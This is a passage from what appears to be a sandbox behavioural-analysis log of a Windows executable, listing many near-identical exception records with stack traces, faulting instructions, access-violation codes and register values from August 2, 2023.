dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142603 registers.esp: 2878220 registers.edi: 38723284 registers.eax: 38523132 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 38310876 registers.esi: 38523132 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x9142689 0xa7f45b 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 d1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142861 registers.esp: 2878220 registers.edi: 38257664 registers.eax: 0 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 38652848 registers.esi: 39872896 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x9142689 0xa7f45b 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 d1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142861 registers.esp: 2878220 registers.edi: 38257664 registers.eax: 0 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 40141784 registers.esi: 41361832 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x9142689 0xa7f45b 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 d1 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142861 registers.esp: 2878220 registers.edi: 38257664 registers.eax: 0 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 41630720 registers.esi: 38515692 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x91429b9 0xa7f4f8 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 a8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142b8a registers.esp: 2878220 registers.edi: 40095720 registers.eax: 0 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 38610404 registers.esi: 39830452 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x91429b9 0xa7f4f8 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 a8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142b8a registers.esp: 2878220 registers.edi: 40095720 registers.eax: 0 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 40101672 registers.esi: 41321720 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x91429b9 0xa7f4f8 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 a8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142b8a registers.esp: 2878220 registers.edi: 40095720 registers.eax: 0 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 38599868 registers.esi: 39823608 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x9142f44 0xa7eb1c 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 3b 45 e0 0f 8f a1 fe ff ff eb 05 e8 b8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x914337a registers.esp: 2878604 registers.edi: 38369120 registers.eax: 0 registers.ebp: 2878648 registers.edx: 0 registers.ebx: 38362912 registers.esi: 38369804 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d rdpcllp+0xc31ff0 @ 0x13fef1ff0 rdpcllp+0xc097ec @ 0x13fec97ec HeapWalk-0x1ce0 kernel32+0x0 @ 0x76c10000 0x37fbb8 0x37fbb8 0x37fbb8 0x3ab95a 0x3831dc 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa 0x3a8e5076d814aa exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 42141 exception.address: 0x7fefd4fa49d registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 1994472144 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3668944 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 3668952 registers.rdi: 5365350400 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: RtlRestoreContext+0x293 __chkstk-0x1fe ntdll+0x50bd2 @ 0x76d80bd2 exception.instruction_r: 48 cf 48 83 ec 30 4c 8b c4 48 81 ec d0 04 00 00 exception.symbol: RtlRestoreContext+0x293 __chkstk-0x1fe ntdll+0x50bd2 exception.instruction: iretq exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 330706 exception.address: 0x76d80bd2 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
